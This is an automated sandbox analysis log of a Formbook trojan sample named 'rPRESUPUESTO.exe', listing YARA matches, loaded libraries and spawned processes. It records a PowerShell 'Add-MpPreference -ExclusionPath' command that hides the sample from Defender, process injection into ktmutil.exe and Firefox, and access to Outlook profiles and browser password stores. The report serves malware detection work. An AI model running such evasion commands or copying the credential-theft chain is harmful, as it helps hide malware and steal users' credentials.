            Source: rPRESUPUESTO.exe, 00000000.00000002.2170963335.00000000076B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000000.00000002.2153184688.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamektmutil.exej% vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000018CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exeBinary or memory string: OriginalFilenamegESw.exe, vs rPRESUPUESTO.exe
            Source: rPRESUPUESTO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2329601584.00000000038F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2329601584.0000000002EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4588318441.0000000004260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: rPRESUPUESTO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, kMIXWOixU8twbSWtxx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, kMIXWOixU8twbSWtxx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, kMIXWOixU8twbSWtxx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@16/14
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPRESUPUESTO.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggwsvlml.yr5.ps1Jump to behavior
            Source: rPRESUPUESTO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: rPRESUPUESTO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ktmutil.exe, 00000009.00000002.4587088156.0000000000695000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4587088156.0000000000666000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4587088156.0000000000671000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2511663435.0000000000666000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rPRESUPUESTO.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\rPRESUPUESTO.exe "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Users\user\Desktop\rPRESUPUESTO.exe "C:\Users\user\Desktop\rPRESUPUESTO.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess created: C:\Users\user\Desktop\rPRESUPUESTO.exe "C:\Users\user\Desktop\rPRESUPUESTO.exe"Jump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: rPRESUPUESTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: rPRESUPUESTO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: rPRESUPUESTO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251157795.000000000098E000.00000002.00000001.01000000.0000000D.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000000.2398762392.000000000098E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: gESw.pdb source: rPRESUPUESTO.exe
            Source: Binary string: wntdll.pdbUGP source: rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gESw.pdbSHA256 source: rPRESUPUESTO.exe
